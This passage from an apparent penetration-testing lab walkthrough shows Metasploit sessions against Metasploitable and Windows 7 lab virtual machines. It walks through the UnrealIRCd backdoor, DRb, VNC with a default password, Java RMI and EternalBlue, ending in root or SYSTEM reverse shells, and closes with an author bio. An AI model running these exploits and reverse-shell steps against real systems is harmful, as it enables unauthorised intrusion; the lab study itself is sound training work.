                  payload => cmd/unix/reverse
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
                • eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
                  inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
                  LHOST => 192.168.222.59
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
                  [*] Started reverse TCP double handler on 192.168.222.59:4444
                  [*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
                  :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
                  [*] 192.168.222.127:6667 – Sending backdoor command…
                  [*] Accepted the first client connection…
                  [*] Accepted the second client connection…
                  [*] Command: echo FtAIdHWFZQ9qDwWD;
                  [*] Writing to socket A
                  [*] Writing to socket B
                  [*] Reading from sockets…
                  [*] Reading from socket B
                  [*] B: “FtAIdHWFZQ9qDwWD\r\n”
                  [*] Matching…
                  [*] A is input…
                  [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400
                  whoami
                  root
                  hostname
                  metasploitable
                  uname -a
                  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

                Example 8 – drb

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
                • let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
                • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
                • on terminal3: msfconsole and then run: msf6 > search drb
                • msf6 > use exploit/linux/misc/drb_remote_codeexec
                • (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)

                Example 9 – vnc

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
                • let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
                • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
                • on terminal3: msfconsole and then run: msf6 > search vnc
                • this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
                • let’s try to connect to VNC on the target machine:
                • (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
                  Connected to RFB server, using protocol version 3.3
                  Performing standard VNC authentication
                  Password: password | the password was password
                  Authentication successful

                Example 10 – java-rmi

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
                • let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
                • on terminal2: msfconsole and then run: msf6 > search java rmi
                • msf6 > use exploit/multi/misc/java_rmi_server
                  [*] No payload configured, defaulting to java/meterpreter/reverse_tcp
                • msf6 exploit(multi/misc/java_rmi_server) > show options
                • msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
                • msf6 exploit(multi/misc/java_rmi_server) > run
                • msf6 exploit(multi/misc/java_rmi_server) > show sessions
                • msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
                • meterpreter > help
                • meterpreter > shell
                  Process 1 created.
                  Channel 1 created.
                  whoami
                  root

                Example 11 – Windows 7 x64 – Eternalblue NSA-developed Exploit

                • check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
                • on terminal1: run sudo nmap -sS 192.168.222.205
                • let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
                • on terminal2: msfconsole and then run msf6 > search eternalblue
                • let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
                • msf6 > use 4
                • msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
                • msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
                • msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205
                  RHOSTS => 192.168.222.205
                • msf6 auxiliary(scanner/smb/smb_ms17_010) > run
                  [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
                  [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
                  [*] Auxiliary module execution completed
                  msf6 auxiliary(scanner/smb/smb_ms17_010) >
                • on terminal2: msfconsole and then run msf6 > search eternalblue
                • let’s use this one to exploit the target: “exploit/windows/smb/ms17_010_eternalblue”
                • msf6 > use 0
                • msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
                • msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
                • msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
                  RHOSTS => 192.168.222.205
                • msf6 exploit(windows/smb/ms17_010_eternalblue) > run
                  [*] Started reverse TCP handler on 192.168.222.59:4444
                  [*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
                  [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
                  [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
                  [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
                  [+] 192.168.222.205:445 – The target is vulnerable.
                  [*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
                  [+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
                  [*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
                  [*] 192.168.222.205:445 – Connecting to target for exploitation.
                  [+] 192.168.222.205:445 – Connection established for exploitation.
                  [+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
                  [*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
                  [*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
                  [*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
                  [*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
                  [+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
                  [*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
                  [*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
                  [*] 192.168.222.205:445 – Starting non-paged pool grooming
                  [+] 192.168.222.205:445 – Sending SMBv2 buffers
                  [+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
                  [*] 192.168.222.205:445 – Sending final SMBv2 buffers.
                  [*] 192.168.222.205:445 – Sending last fragment of exploit packet!
                  [*] 192.168.222.205:445 – Receiving response from exploit packet
                  [+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
                  [*] 192.168.222.205:445 – Sending egg to corrupted connection.
                  [*] 192.168.222.205:445 – Triggering free of corrupted buffer.
                  [*] Sending stage (200262 bytes) to 192.168.222.205
                  [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  [+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  [*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400
                • meterpreter > getuid
                  Server username: NT AUTHORITY\SYSTEM
                  meterpreter > help


                Cogeanu Marius
                https://cogeanu.com
                Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech. Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning. Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight. Discover more on https://cogeanu.com
